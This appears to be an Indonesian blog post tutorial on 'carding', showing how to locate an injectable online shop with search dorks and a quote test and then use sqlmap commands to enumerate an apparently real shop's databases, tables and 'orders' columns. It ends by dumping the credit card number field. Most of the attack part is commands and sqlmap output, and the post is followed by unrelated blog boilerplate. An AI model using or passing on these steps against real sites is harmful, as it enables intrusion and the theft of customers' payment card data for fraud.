INDONESIA HACKER CYBER TEAM




1. Sqlmap
2. Dork carding ( bisa cari di google ) / download
3. Sqli scanner :

4. Download Dork 
Pertama ,ambil dork lalu scan menggunakan sqli scanner :
Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="
Nah, web tersebut error saat kita inject ,




Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs
Disini kita mendapatkan 3 database :



[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :




Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+---------------------------------+
| amanu                             |
| categories                        |
| clients                             |
| components                     |
| config                              |
| config_groups                   |
| customers                      |
| form_data                     |
| form_fields                   |
| forms                            |
| geo                               |
| groups                           |
| item_amanu                  |
| item_cat                        |
| item_files                       |
| item_files_customer       |
| item_options                  |
| item_options_linked       |
| item_options_values       |
| item_related                  |
| item_thread                   |
| item_thread_old            |
| items                            |
| items_addphoto            |
| items_item_files           |
| items_packages              |
| languages                      |
| logs                               |
| mailinglist                     |
| mailinglist_cat              |
| mailinglist_members      |
| manu                             |
| news                             |
| news_cat                       |
| news_news_cat              |
| orders                            |
| photos                           |
| photos_cat                    |
| pic_gallery                    |
| ship_prices                    |
| ship_zones                     |
| sites                              |
| sites_components           |
| thread                             |
| thread_gel                      |
| thread_items                  |
| ups                                 |
| ups_packaging                |
| ups_pickup                     |
| ups_service                     |
| ups_units                        |
| users                              |
| users_access                   |
| users_groups                   |
| users_spu                        |
| users_spu_values             |
| zones                               |
+------------------------------------+
[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 



Table: orders
[18 columns]
+-------------------+------------------------+
| Column           |       Type               |
+-------------------+------------------------+
| cart_id            | varchar(15)     |
| cc_ex_month   | tinyint(4)        |
| cc_ex_year      | int(11)            |
| cc_number      | varchar(30)     |
| cc_type           | varchar(20)     |
| customer_id    | int(11)            |
| cvv2                | varchar(20)    |
| date                | datetime        |
| id                    | int(11)           |
| ipaddress         | varchar(25)    |
| payment_method  | varchar(15) |
| shipping           | float(8,2)      |
| shipping_method | varchar(5)  |
| status               | tinyint(4)     |
| subtotal            | float(8,2)     |
| tax                   | float(8,2)     |
| text                  | text             |
| total                 | float(8,2)     |
+-----------------+-------------+-----------+
Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .
Axact

KAOS DAKWAH

KAOS DAKWAH adalah blog membahas tentang cara pembuatan Kaos Dakwah sampai bagaimana cara menjual Kaos Dakwah Online maupun offline, Silakan cari artikel di GHIRAH.COM..Terima Kasih telah berkunjung di blog sederhana ini, Jika antum PRODUSEN KAOS DAKWAH ATAU DISTRO MAU KERJASAMA SILAKAN KONTAK NO TLP YANG ADA DI WEB GHIRAH.COM

Post A Comment:

0 comments: